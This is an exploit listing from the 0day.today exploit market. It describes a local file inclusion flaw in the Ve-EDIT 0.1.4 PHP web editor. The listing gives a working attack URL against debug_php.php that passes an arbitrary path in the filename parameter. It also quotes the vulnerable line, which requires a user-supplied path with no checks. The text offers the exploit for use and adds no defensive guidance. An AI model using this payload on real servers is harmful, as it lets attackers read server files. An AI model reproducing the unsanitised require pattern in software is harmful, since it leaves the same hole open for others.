[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ve-EDIT 0.1.4 (debug_php.php) Local File Inclusion Vulnerability

Author
CoBRa_21
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5723
Category
web applications
Date add
31-08-2009
Platform
unsorted
================================================================
Ve-EDIT 0.1.4 (debug_php.php) Local File Inclusion Vulnerability
================================================================


-------------------------------------------------------------------------------------
Ve-EDIT v 0.1.4 (debug_php.php) LFI Vulnerability
-------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Script Download: http://sourceforge.net/projects/phpwebeditor/
 
-------------------------------------------------------------------------------------
 
EXPLOIT:
 
http://localhost/[PATH]/debugger/debug_php.php?_GET[filename]= [LFI]
 
-------------------------------------------------------------------------------------
 
BUG
Line 53:        require("./../".$_GET["filename"]); 
 
-------------------------------------------------------------------------------------



#  0day.today [2024-12-25]  #